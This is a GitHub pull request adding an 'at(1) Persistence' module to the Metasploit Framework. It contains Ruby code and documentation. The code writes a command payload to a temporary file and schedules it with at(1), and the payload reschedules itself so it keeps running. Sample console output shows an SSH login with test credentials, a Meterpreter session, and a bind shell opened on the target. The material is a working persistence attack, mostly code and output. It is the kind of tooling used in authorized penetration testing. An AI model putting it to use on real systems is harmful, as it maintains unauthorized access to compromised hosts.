### PR TITLE
at(1) persistence

### DIFF
--- a/documentation/modules/exploit/multi/local/at_persistence.md
+++ b/documentation/modules/exploit/multi/local/at_persistence.md
@@ -1,0 +1,32 @@
+## Vulnerable Application
+
+This module executes a metasploit payload utilizing `at(1)` to execute jobs at a specific time.  It should work out of the box
+with any UNIX-like operating system with `atd` running.  In the case of OS X, the `atrun` service must be launched:
+
+```
+sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
+```
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  3. Do: `use exploit/multi/local/at_persistence`
+  4. Do: `set session #`
+  5. Do: `set target #`
+  6. `exploit`
+
+
+## Options
+
+  **TIMING**
+
+  Controls the time value passed to `at(1)`
+
+  **PATH**
+
+  If set, uses this value as the path on the remote system to store the payload.  If unset, uses `mktemp`.
+
+## Scenarios
+
+TBD

--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -80,6 +80,7 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(payload_file, persistent_payload)
     register_files_for_cleanup(payload_file) if datastore['CLEANUP']
 
+    cmd_exec("chmod 700 #{payload_file}")
     cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
 
     print_status("Waiting  up to #{datastore['WfsDelay']}sec for execution")

--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NoAccess, 'User denied cron via at.deny')
     end
 
-    unless payload_file = datastore['PATH'] || cmd_exec('mktemp')
+    unless (payload_file = datastore['PATH'] || cmd_exec('mktemp'))
       fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
     end
 

--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -76,7 +76,8 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
     end
 
-    write_file(payload_file, payload.encoded)
+    persistent_payload = "at -f #{payload_file} #{datastore['TIME']}\n" + payload.encoded
+    write_file(payload_file, persistent_payload)
     register_files_for_cleanup(payload_file) if datastore['CLEANUP']
 
     cmd_exec("at -f #{payload_file} #{datastore['TIME']}")

--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Local
           ],
         'Targets'        => [['Automatic', {} ]],
         'DefaultTarget'  => 0,
-        'Platform'       => ['unix', 'linux', 'osx'],
+        'Platform'       => %w(unix linux osx bsd solaris openbsd bsdi netbsd freebsd aix hpux irix),
         'Arch'           => ARCH_CMD,
         'Payload'        =>
         {
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local
             'RequiredCmd'  => 'generic perl ruby python'
           }
         },
-        'DefaultOptions' => { 'WfsDelay' => 60 },
+        'DefaultOptions' => { 'WfsDelay' => 65 },
         'DisclosureDate' => "Jan 1 1997" # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html
       )
     )
@@ -77,8 +77,10 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     write_file(payload_file, payload.encoded)
-    cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
     register_files_for_cleanup(payload_file) if datastore['CLEANUP']
+
+    cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
+
     print_status("Waiting #{datastore['WfsDelay']}sec for execution")
     0.upto(datastore['WfsDelay'].to_i) do
       Rex.sleep(1)

--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
 
-    print_status("Waiting #{datastore['WfsDelay']}sec for execution")
+    print_status("Waiting  up to #{datastore['WfsDelay']}sec for execution")
     0.upto(datastore['WfsDelay'].to_i) do
       Rex.sleep(1)
       break if session_created?

--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -25,14 +25,14 @@ class MetasploitModule < Msf::Exploit::Local
           ],
         'Targets'        => [['Automatic', {} ]],
         'DefaultTarget'  => 0,
-        'Platform'       => %w(unix linux osx bsd solaris openbsd bsdi netbsd freebsd aix hpux irix),
+        'Platform'       => %w(unix),
         'Arch'           => ARCH_CMD,
         'Payload'        =>
         {
           'Compat'     =>
           {
-            'PayloadType'  => 'cmd',
-            'RequiredCmd'  => 'generic perl ruby python'
+            'PayloadType'  => 'cmd cmd_bash',
+            'RequiredCmd'  => 'bash-tcp gawk generic openssl perl python ruby'
           }
         },
         'DefaultOptions' => { 'WfsDelay' => 65 },

--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -47,14 +47,22 @@ class MetasploitModule < Msf::Exploit::Local
     )
   end
 
-  # TODO: find a better way to determine if the user can use at(1).  cmd_exec doesn't get us stderr or a return code
   def check
-    cmd_exec("ls -l")
+    token = "fail #{Rex::Text.rand_text_alphanumeric(8)}"
+    if cmd_exec("at -l || echo #{token}") =~ /#{token}/
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Vulnerable
+    end
   end
 
   def exploit
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::NoAccess, 'User denied cron via at.deny')
+    end
+
     write_file("/tmp/test.sh", payload.encoded)
-    print_status(cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}"))
+    cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}")
     print_status("Waiting #{datastore['WfsDelay']}sec for execution")
     Rex.sleep(datastore['WfsDelay'].to_i)
   end

--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -1,0 +1,61 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'at(1) Persistence',
+        'Description'    => %q(
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Jon Hart <jon_hart@rapid7.com>'
+          ],
+        'Targets'        => [['Automatic', {} ]],
+        'DefaultTarget'  => 0,
+        'Platform'       => ['unix', 'linux', 'osx'],
+        'Arch'           => ARCH_CMD,
+        'Payload'        =>
+        {
+          'Compat'     =>
+          {
+            'PayloadType'  => 'cmd',
+            'RequiredCmd'  => 'generic perl ruby python'
+          }
+        },
+        'DefaultOptions' => { 'WfsDelay' => 60 },
+        'DisclosureDate' => "Jan 1 1997" # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TIME', [false, 'When to run job via at(1).  Changing may require WfsDelay to be adjusted', 'now + 1 minute']),
+        OptBool.new('CLEANUP', [true, 'Delete at entry and payload after execution', true])
+      ]
+    )
+  end
+
+  # TODO: find a better way to determine if the user can use at(1).  cmd_exec doesn't get us stderr or a return code
+  def check
+    cmd_exec("ls -l")
+  end
+
+  def exploit
+    write_file("/tmp/test.sh", payload.encoded)
+    print_status(cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}"))
+    print_status("Waiting #{datastore['WfsDelay']}sec for execution")
+    Rex.sleep(datastore['WfsDelay'].to_i)
+  end
+end

--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -16,6 +16,7 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name'           => 'at(1) Persistence',
         'Description'    => %q(
+          This module achieves persisience by executing payloads via at(1).
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -42,7 +43,13 @@ class MetasploitModule < Msf::Exploit::Local
     register_options(
       [
         OptString.new('TIME', [false, 'When to run job via at(1).  Changing may require WfsDelay to be adjusted', 'now + 1 minute']),
-        OptBool.new('CLEANUP', [true, 'Delete at entry and payload after execution', true])
+        OptBool.new('CLEANUP', [true, 'Delete payload after execution', true])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('PATH', [false, 'Path to store payload to be executed by at(1).  Leave unset to use mktemp'])
       ]
     )
   end
@@ -56,14 +63,26 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
+  def cmd_exec(cmd)
+    super("PATH=/bin:/usr/bin:/usr/local/bin #{cmd}")
+  end
+
   def exploit
     unless check == Exploit::CheckCode::Vulnerable
       fail_with(Failure::NoAccess, 'User denied cron via at.deny')
     end
 
-    write_file("/tmp/test.sh", payload.encoded)
-    cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}")
+    unless payload_file = datastore['PATH'] || cmd_exec('mktemp')
+      fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
+    end
+
+    write_file(payload_file, payload.encoded)
+    cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
+    register_files_for_cleanup(payload_file) if datastore['CLEANUP']
     print_status("Waiting #{datastore['WfsDelay']}sec for execution")
-    Rex.sleep(datastore['WfsDelay'].to_i)
+    0.upto(datastore['WfsDelay'].to_i) do
+      Rex.sleep(1)
+      break if session_created?
+    end
   end
 end


### PR DESCRIPTION
This was an idea taken from @h00die's #7003 which added `cron` "persistence".  Maybe somebody will find this useful, someday.  
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] Get a session on a suitable Linux/Unix/BSD target
- [x] `use exploit/multi/local/at_persistence`
- [x] `set SESSION <session>`
- [x] `set PAYLOAD <payload>`
- [x] `check`, and confirm that the target is suitable for exploitation
- [x] `exploit`, and confirm that within ~60s you get a shell
- [x] Optionally fiddle with `CLEANUP` and `TIME` regular options and/or `PATH` advanced option

Sample output:

```
resource (/tmp/at.rc)> use exploit/multi/ssh/sshexec
resource (/tmp/at.rc)> set USERNAME test
USERNAME => test
resource (/tmp/at.rc)> set PASSWORD test
PASSWORD => test
resource (/tmp/at.rc)> set RHOST a.b.c.d
RHOST => a.b.c.d
resource (/tmp/at.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
resource (/tmp/at.rc)> run -j
[*] Exploit running as background job.
resource (/tmp/at.rc)> sleep 5
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] a.b.c.d:22 - Sending stager...
[*] Command Stager progress -  42.09% done (306/727 bytes)
[*] Command Stager progress - 100.00% done (727/727 bytes)
[*] Sending stage (1495599 bytes) to a.b.c.d
[*] Meterpreter session 1 opened (a.b.c.a:52864 -> a.b.c.d:4444) at 2016-09-14 16:17:34 -0700
resource (/tmp/at.rc)> use exploit/multi/local/at_persistence
resource (/tmp/at.rc)> set PAYLOAD cmd/unix/bind_perl
PAYLOAD => cmd/unix/bind_perl
resource (/tmp/at.rc)> set RHOST a.b.c.d
RHOST => a.b.c.d
resource (/tmp/at.rc)> set RPORT 12345
RPORT => 12345
resource (/tmp/at.rc)> set SESSION 1
SESSION => 1
resource (/tmp/at.rc)> set CLEANUP false
CLEANUP => false
resource (/tmp/at.rc)> run
[*] Started bind handler
[*] Waiting  up to 65sec for execution
[*] Command shell session 2 opened (a.b.c.a:52953 -> a.b.c.d:4444) at 2016-09-14 16:18:00 -0700

id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
```
